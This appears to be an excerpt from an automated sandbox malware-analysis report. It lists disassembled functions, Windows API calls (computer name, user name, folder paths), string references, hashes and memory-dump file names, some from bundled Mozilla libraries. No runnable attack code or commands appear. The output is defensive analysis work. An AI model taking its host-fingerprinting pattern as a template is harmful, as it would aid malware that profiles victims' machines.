Associated: 00000000.00000002.2274255034.0000000000F16000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_890000_file.jbxd

Yara matches

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: e352ec17a3aca9e1203b8c4490ca5fff8937d7e5d761b0868cdc0387fcc25325
Instruction ID: a7ee566942dd575135853f6710d7248aa2fe37033fffe140df5c02519f2e0d27
Opcode Fuzzy Hash: e352ec17a3aca9e1203b8c4490ca5fff8937d7e5d761b0868cdc0387fcc25325
Instruction Fuzzy Hash: DBF01570C0020CEBEB04EFA8D5496DCBB74FB12310F108199E826E7AC0DB346B46DB82

Function 008A8DE0 Relevance: 1.5, APIs: 1, Instructions: 23COMMON

Download Yara Rule

APIs

SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 008A8E0B

Part of subcall function 008AA740: lstrcpy.KERNEL32(008B0E17,00000000), ref: 008AA788

Memory Dump Source

Source File: 00000000.00000002.2273166717.0000000000891000.00000040.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true

Associated: 00000000.00000002.2273147709.0000000000890000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000008EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000915000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000941000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000972000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000097F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000099F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000009AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000009AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000ADA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000AEE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000C6E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D6C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D73000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D82000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274101961.0000000000D83000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274236015.0000000000F15000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274255034.0000000000F16000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_890000_file.jbxd

Yara matches

Similarity

API ID: FolderPathlstrcpy
String ID:
API String ID: 1699248803-0
Opcode ID: d37e2156965242cc452e3c6a3a5e811d1356ce2ab3d9d497db0b67015f74c63f
Instruction ID: 392dc5a0d5468d8c2cd469a06c01599bf80828785107a2018fa3b4ff5b834f22
Opcode Fuzzy Hash: d37e2156965242cc452e3c6a3a5e811d1356ce2ab3d9d497db0b67015f74c63f
Instruction Fuzzy Hash: BFE0123194034C6BEB91DB94CC96FAE777CEB44B01F004295BA0C9A1C0DE70AB858B92

Function 00891190 Relevance: 1.5, APIs: 1, Instructions: 22COMMON

Download Yara Rule

APIs

Part of subcall function 008A78E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 008A7910
Part of subcall function 008A78E0: RtlAllocateHeap.NTDLL(00000000), ref: 008A7917
Part of subcall function 008A78E0: GetComputerNameA.KERNEL32(?,00000104), ref: 008A792F

Part of subcall function 008A7850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,008911B7), ref: 008A7880
Part of subcall function 008A7850: RtlAllocateHeap.NTDLL(00000000), ref: 008A7887
Part of subcall function 008A7850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 008A789F

ExitProcess.KERNEL32 ref: 008911C6

Memory Dump Source

Source File: 00000000.00000002.2273166717.0000000000891000.00000040.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true

Associated: 00000000.00000002.2273147709.0000000000890000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000008EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000915000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000941000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000972000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000097F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000099F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000009AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000009AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000ADA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000AEE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000C6E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D6C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D73000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D82000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274101961.0000000000D83000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274236015.0000000000F15000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274255034.0000000000F16000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_890000_file.jbxd

Yara matches

Similarity

API ID: Heap$Process$AllocateName$ComputerExitUser
String ID:
API String ID: 3550813701-0
Opcode ID: fb923ac71ad3f2a95d0fe7c075eae34d0598c15091259a4bdcca58f63a3ef2f1
Instruction ID: 1563fc319760b7928b66916e9bc648e855d3bc48e79af64401b20413f6eb7cc7
Opcode Fuzzy Hash: fb923ac71ad3f2a95d0fe7c075eae34d0598c15091259a4bdcca58f63a3ef2f1
Instruction Fuzzy Hash: ABE012B5E14302A3EE00B3F8BC0AB2A339CFB25345F081425FA06D2502FA29F801857F

Function 008A8E30 Relevance: 1.3, APIs: 1, Instructions: 35memoryCOMMON

Download Yara Rule

APIs

LocalAlloc.KERNEL32(00000040,-00000001), ref: 008A8E52

Memory Dump Source

Source File: 00000000.00000002.2273166717.0000000000891000.00000040.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true

Associated: 00000000.00000002.2273147709.0000000000890000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000008EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000915000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000941000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000972000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000097F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000099F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000009AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000009AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000ADA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000AEE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000C6E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D6C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D73000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D82000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274101961.0000000000D83000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274236015.0000000000F15000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274255034.0000000000F16000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_890000_file.jbxd

Yara matches

Similarity

API ID: AllocLocal
String ID:
API String ID: 3494564517-0
Opcode ID: 5e83221d90e1a2f14fb56c63f09c506ed1f544adf25d7f9ad0560cc527a31462
Instruction ID: 846a8af717eca64ef80c95fb47f6f06d8e2a61b593016552b8a51288f9764531
Opcode Fuzzy Hash: 5e83221d90e1a2f14fb56c63f09c506ed1f544adf25d7f9ad0560cc527a31462
Instruction Fuzzy Hash: 3401FB3090410CEFDB04CF98C5857AC7BB1FF05308F688098D905AB750C7756EA4DB95

Non-executed Functions

Function 6C665440 Relevance: 138.8, APIs: 54, Strings: 25, Instructions: 587threadtimeCOMMON

Download Yara Rule

APIs

getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING), ref: 6C665492
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C6654A8
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C6654BE
__Init_thread_footer.LIBCMT ref: 6C6654DB

Part of subcall function 6C68AB3F: EnterCriticalSection.KERNEL32(6C6DE370,?,?,6C653527,6C6DF6CC,?,?,?,?,?,?,?,?,6C653284), ref: 6C68AB49
Part of subcall function 6C68AB3F: LeaveCriticalSection.KERNEL32(6C6DE370,?,6C653527,6C6DF6CC,?,?,?,?,?,?,?,?,6C653284,?,?,6C6756F6), ref: 6C68AB7C

Part of subcall function 6C68CBE8: GetCurrentProcess.KERNEL32(?,6C6531A7), ref: 6C68CBF1
Part of subcall function 6C68CBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C6531A7), ref: 6C68CBFA

GetCurrentThreadId.KERNEL32 ref: 6C6654F9
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_HELP), ref: 6C665516
GetCurrentThreadId.KERNEL32 ref: 6C66556A
AcquireSRWLockExclusive.KERNEL32(6C6DF4B8), ref: 6C665577
moz_xmalloc.MOZGLUE(00000070), ref: 6C665585
?ProcessCreation@TimeStamp@mozilla@@SA?AV12@XZ.MOZGLUE(00000000,00000001), ref: 6C665590
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_PROFILER_STARTUP,?,00000001), ref: 6C6655E6
ReleaseSRWLockExclusive.KERNEL32(6C6DF4B8), ref: 6C665606
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C665616

Part of subcall function 6C68AB89: EnterCriticalSection.KERNEL32(6C6DE370,?,?,?,6C6534DE,6C6DF6CC,?,?,?,?,?,?,?,6C653284), ref: 6C68AB94
Part of subcall function 6C68AB89: LeaveCriticalSection.KERNEL32(6C6DE370,?,6C6534DE,6C6DF6CC,?,?,?,?,?,?,?,6C653284,?,?,6C6756F6), ref: 6C68ABD1

GetCurrentThreadId.KERNEL32 ref: 6C66563E
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C665646
exit.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000), ref: 6C66567C
free.MOZGLUE(?), ref: 6C6656AE

Part of subcall function 6C675E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6C675EDB
Part of subcall function 6C675E90: memset.VCRUNTIME140(ewkl,000000E5,?), ref: 6C675F27
Part of subcall function 6C675E90: LeaveCriticalSection.KERNEL32(?), ref: 6C675FB2

getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_PROFILER_STARTUP_NO_BASE), ref: 6C6656E8
GetCurrentThreadId.KERNEL32 ref: 6C665707
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,00000001), ref: 6C66570F
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_PROFILER_STARTUP_ENTRIES), ref: 6C665729
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_PROFILER_STARTUP_DURATION), ref: 6C66574E
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_PROFILER_STARTUP_INTERVAL), ref: 6C66576B
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_PROFILER_STARTUP_FEATURES_BITFIELD), ref: 6C665796
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_PROFILER_STARTUP_FEATURES), ref: 6C6657B3
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_PROFILER_STARTUP_FILTERS), ref: 6C6657CA

Strings

MOZ_PROFILER_STARTUP_ENTRIES, xrefs: 6C665724
MOZ_BASE_PROFILER_LOGGING, xrefs: 6C6654B9
MOZ_PROFILER_STARTUP_FILTERS, xrefs: 6C6657C5
MOZ_BASE_PROFILER_HELP, xrefs: 6C665511
MOZ_PROFILER_STARTUP_FEATURES_BITFIELD, xrefs: 6C665791
- MOZ_PROFILER_STARTUP_DURATION not a valid float: %s, xrefs: 6C665CF9
GeckoMain, xrefs: 6C665554, 6C6655D5
MOZ_PROFILER_STARTUP_INTERVAL, xrefs: 6C665766
MOZ_PROFILER_STARTUP_NO_BASE, xrefs: 6C6656E3
MOZ_BASE_PROFILER_VERBOSE_LOGGING, xrefs: 6C66548D
- MOZ_PROFILER_STARTUP_ENTRIES unit must be one of the following: KB, KiB, MB, MiB, GB, GiB, xrefs: 6C665D2B
- MOZ_PROFILER_STARTUP_INTERVAL not a valid float: %s, xrefs: 6C665D01
MOZ_PROFILER_STARTUP_FEATURES, xrefs: 6C6657AE
MOZ_BASE_PROFILER_DEBUG_LOGGING, xrefs: 6C6654A3
[I %d/%d] profiler_init, xrefs: 6C66564E
[I %d/%d] -> This process is excluded and won't be profiled, xrefs: 6C665BBE
- MOZ_PROFILER_STARTUP_FEATURES_BITFIELD not a valid integer: %s, xrefs: 6C665D1C
MOZ_PROFILER_STARTUP, xrefs: 6C6655E1
[I %d/%d] - MOZ_PROFILER_STARTUP_FILTERS = %s, xrefs: 6C665B38
[I %d/%d] - MOZ_PROFILER_STARTUP_FEATURES = %d, xrefs: 6C66584E
[I %d/%d] - MOZ_PROFILER_STARTUP_FEATURES_BITFIELD = %d, xrefs: 6C665AC9
- MOZ_PROFILER_STARTUP_ENTRIES not a valid integer: %s, xrefs: 6C665D24
MOZ_PROFILER_STARTUP_DURATION, xrefs: 6C665749
[I %d/%d] - MOZ_PROFILER_STARTUP_ENTRIES = %u, xrefs: 6C665C56
[I %d/%d] - MOZ_PROFILER_STARTUP is set, xrefs: 6C665717

Memory Dump Source

Source File: 00000000.00000002.2301550177.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2301525550.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2301610914.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2301644027.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2301665427.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: getenv$CriticalSection$Current$Thread$EnterLeaveProcess$ExclusiveLock_getpidfree$AcquireCreation@Init_thread_footerReleaseStamp@mozilla@@TerminateTimeV12@exitmemsetmoz_xmalloc
String ID: - MOZ_PROFILER_STARTUP_DURATION not a valid float: %s$- MOZ_PROFILER_STARTUP_ENTRIES not a valid integer: %s$- MOZ_PROFILER_STARTUP_ENTRIES unit must be one of the following: KB, KiB, MB, MiB, GB, GiB$- MOZ_PROFILER_STARTUP_FEATURES_BITFIELD not a valid integer: %s$- MOZ_PROFILER_STARTUP_INTERVAL not a valid float: %s$GeckoMain$MOZ_BASE_PROFILER_DEBUG_LOGGING$MOZ_BASE_PROFILER_HELP$MOZ_BASE_PROFILER_LOGGING$MOZ_BASE_PROFILER_VERBOSE_LOGGING$MOZ_PROFILER_STARTUP$MOZ_PROFILER_STARTUP_DURATION$MOZ_PROFILER_STARTUP_ENTRIES$MOZ_PROFILER_STARTUP_FEATURES$MOZ_PROFILER_STARTUP_FEATURES_BITFIELD$MOZ_PROFILER_STARTUP_FILTERS$MOZ_PROFILER_STARTUP_INTERVAL$MOZ_PROFILER_STARTUP_NO_BASE$[I %d/%d] -> This process is excluded and won't be profiled$[I %d/%d] - MOZ_PROFILER_STARTUP is set$[I %d/%d] - MOZ_PROFILER_STARTUP_ENTRIES = %u$[I %d/%d] - MOZ_PROFILER_STARTUP_FEATURES = %d$[I %d/%d] - MOZ_PROFILER_STARTUP_FEATURES_BITFIELD = %d$[I %d/%d] - MOZ_PROFILER_STARTUP_FILTERS = %s$[I %d/%d] profiler_init
API String ID: 3686969729-1266492768
Opcode ID: 9723cfc490d2767776d13f6d4db7c8a092534f89ff03e26e62870104a5c6f412
Instruction ID: 177a8c64f2d46a8a752f75fa61e52c8de68fafea378d92d8cf6f77fefddd9d63
Opcode Fuzzy Hash: 9723cfc490d2767776d13f6d4db7c8a092534f89ff03e26e62870104a5c6f412
Instruction Fuzzy Hash: 2D2205709043419FDB009F76C89666ABBB5AF8734CF04462AE94A87F42EB31E445CB5F

Function 6C666C80 Relevance: 95.2, APIs: 50, Strings: 4, Instructions: 727encryptionfileCOMMON

Download Yara Rule

APIs

CryptQueryObject.CRYPT32(00000001,?,00000400,00000002,00000000,?,?,?,?,?,00000000), ref: 6C666CCC
CryptMsgGetParam.CRYPT32(00000000,00000007,00000000,00000000,0000000C), ref: 6C666D11
moz_xmalloc.MOZGLUE(0000000C), ref: 6C666D26

Part of subcall function 6C66CA10: malloc.MOZGLUE(?), ref: 6C66CA26

memset.VCRUNTIME140(00000000,00000000,0000000C), ref: 6C666D35
CryptMsgGetParam.CRYPT32(00000000,00000007,00000000,00000000,0000000C), ref: 6C666D53
CertFindCertificateInStore.CRYPT32(00000000,00010001,00000000,000B0000,00000000,00000000), ref: 6C666D73
free.MOZGLUE(00000000), ref: 6C666D80
CertGetNameStringW.CRYPT32 ref: 6C666DC0
moz_xmalloc.MOZGLUE(00000000), ref: 6C666DDC
memset.VCRUNTIME140(00000000,00000000,00000000), ref: 6C666DEB
CertGetNameStringW.CRYPT32(00000000,00000004,00000000,00000000,00000000,00000000), ref: 6C666DFF
CertFreeCertificateContext.CRYPT32(00000000), ref: 6C666E10
CryptMsgClose.CRYPT32(00000000), ref: 6C666E27
CertCloseStore.CRYPT32(00000000,00000000), ref: 6C666E34
CreateFileW.KERNEL32 ref: 6C666EF9
moz_xmalloc.MOZGLUE(00000000), ref: 6C666F7D
memset.VCRUNTIME140(00000000,00000000,00000000), ref: 6C666F8C
memset.VCRUNTIME140(00000002,00000000,00000208), ref: 6C66709D
CryptQueryObject.CRYPT32(00000001,00000002,00000400,00000002,00000000,?,?,?,?,?,00000000), ref: 6C667103
free.MOZGLUE(00000000), ref: 6C667153
CloseHandle.KERNEL32(?), ref: 6C667176
__Init_thread_footer.LIBCMT ref: 6C667209
__Init_thread_footer.LIBCMT ref: 6C66723A
__Init_thread_footer.LIBCMT ref: 6C66726B
__Init_thread_footer.LIBCMT ref: 6C66729C
__Init_thread_footer.LIBCMT ref: 6C6672DC
__Init_thread_footer.LIBCMT ref: 6C66730D
memset.VCRUNTIME140(?,00000000,00000110), ref: 6C6673C2
VerSetConditionMask.NTDLL ref: 6C6673F3
VerSetConditionMask.NTDLL ref: 6C6673FF
VerSetConditionMask.NTDLL ref: 6C667406
VerSetConditionMask.NTDLL ref: 6C66740D
VerifyVersionInfoW.KERNEL32(?,00000033,00000000), ref: 6C66741A
moz_xmalloc.MOZGLUE(?), ref: 6C66755A
memset.VCRUNTIME140(00000000,00000000,?), ref: 6C667568
CryptBinaryToStringW.CRYPT32(00000000,00000000,4000000C,00000000,?), ref: 6C667585
_wcsupr_s.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?), ref: 6C667598
free.MOZGLUE(00000000), ref: 6C6675AC

Part of subcall function 6C68AB89: EnterCriticalSection.KERNEL32(6C6DE370,?,?,?,6C6534DE,6C6DF6CC,?,?,?,?,?,?,?,6C653284), ref: 6C68AB94
Part of subcall function 6C68AB89: LeaveCriticalSection.KERNEL32(6C6DE370,?,6C6534DE,6C6DF6CC,?,?,?,?,?,?,?,6C653284,?,?,6C6756F6), ref: 6C68ABD1

Strings

CryptCATAdminReleaseCatalogContext, xrefs: 6C6672C8
wintrust.dll, xrefs: 6C6672CD
(, xrefs: 6C66768A
SHA256, xrefs: 6C666EC0

Memory Dump Source

Source File: 00000000.00000002.2301550177.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2301525550.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2301610914.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2301644027.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2301665427.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: CryptInit_thread_footermemset$Cert$ConditionMaskmoz_xmalloc$CloseStringfree$CertificateCriticalNameObjectParamQuerySectionStore$BinaryContextCreateEnterFileFindFreeHandleInfoLeaveVerifyVersion_wcsupr_smalloc
String ID: ($CryptCATAdminReleaseCatalogContext$SHA256$wintrust.dll
API String ID: 3256780453-3980470659
Opcode ID: 7fc89b314fb4aa2afe388c52032a03451903b56d09fef3437752505b54f425da
Instruction ID: 66a7cec88e3af785e2294924bd49185265c2d8ef4da158a834f2fe8299d93b89
Opcode Fuzzy Hash: 7fc89b314fb4aa2afe388c52032a03451903b56d09fef3437752505b54f425da
Instruction Fuzzy Hash: 9852E871A042149FEB21DF26CC84BAA77B8EF46704F144599E909A7A40DB70BF84CF5A

Function 6C690DD0 Relevance: 83.9, APIs: 36, Strings: 10, Instructions: 3368COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?), ref: 6C690F1F
LeaveCriticalSection.KERNEL32(?), ref: 6C690F99
memcpy.VCRUNTIME140(?,?,?), ref: 6C690FB7
EnterCriticalSection.KERNEL32(?), ref: 6C690FE9
memset.VCRUNTIME140(?,000000E5,00000000), ref: 6C691031
LeaveCriticalSection.KERNEL32(?), ref: 6C6910D0
EnterCriticalSection.KERNEL32(?), ref: 6C69117D
memset.VCRUNTIME140(?,000000E5,?), ref: 6C691C39
EnterCriticalSection.KERNEL32(6C6DE744), ref: 6C693391
LeaveCriticalSection.KERNEL32(6C6DE744), ref: 6C6933CD
LeaveCriticalSection.KERNEL32(?), ref: 6C693431
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C693437

Strings

Compile-time page size does not divide the runtime one., xrefs: 6C693946
MALLOC_OPTIONS, xrefs: 6C6935FE
MOZ_RELEASE_ASSERT(mNode), xrefs: 6C693559, 6C69382D, 6C693848
: (malloc) Unsupported character in malloc options: ', xrefs: 6C693A02
MOZ_CRASH(), xrefs: 6C693950
MOZ_RELEASE_ASSERT(!aArena || arena == aArena), xrefs: 6C693793
<jemalloc>, xrefs: 6C693941, 6C6939F1
MOZ_RELEASE_ASSERT((run->mRegionsMask[elm] & (1U << bit)) == 0) (Double-free?), xrefs: 6C6937D2
MOZ_RELEASE_ASSERT((mapelm->bits & ((size_t)0x20U)) == 0) (Freeing in decommitted page.), xrefs: 6C6937A8
MOZ_RELEASE_ASSERT((mapelm->bits & ((size_t)0x01U)) != 0) (Double-free?), xrefs: 6C6937BD

Memory Dump Source

Source File: 00000000.00000002.2301550177.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2301525550.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2301610914.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2301644027.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2301665427.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: CriticalSection$EnterLeave$memset$_errnomemcpy
String ID: : (malloc) Unsupported character in malloc options: '$<jemalloc>$Compile-time page size does not divide the runtime one.$MALLOC_OPTIONS$MOZ_CRASH()$MOZ_RELEASE_ASSERT(!aArena || arena == aArena)$MOZ_RELEASE_ASSERT((mapelm->bits & ((size_t)0x01U)) != 0) (Double-free?)$MOZ_RELEASE_ASSERT((mapelm->bits & ((size_t)0x20U)) == 0) (Freeing in decommitted page.)$MOZ_RELEASE_ASSERT((run->mRegionsMask[elm] & (1U << bit)) == 0) (Double-free?)$MOZ_RELEASE_ASSERT(mNode)
API String ID: 3040639385-4173974723
Opcode ID: 490fd3e4da68b349dcf174aeb13f7e1aa5eb04aedbdc4e08c90c6a630371fe5e
Instruction ID: 96dae9f6c816b0358c2a12f1448292288e71a0c622159dc55be4494e21494cd5
Opcode Fuzzy Hash: 490fd3e4da68b349dcf174aeb13f7e1aa5eb04aedbdc4e08c90c6a630371fe5e
Instruction Fuzzy Hash: 1F539E71A057028FD704CF29C580616FBE1BF8A328F29C76DE8699B791D771E842CB85

Function 6C6B34A0 Relevance: 61.0, APIs: 33, Strings: 1, Instructions: 1467COMMON

Download Yara Rule

APIs

floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6B3527
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6B355B
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6B35BC
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6B35E0
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6B363A
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6B3693
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6B36CD
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6B3703
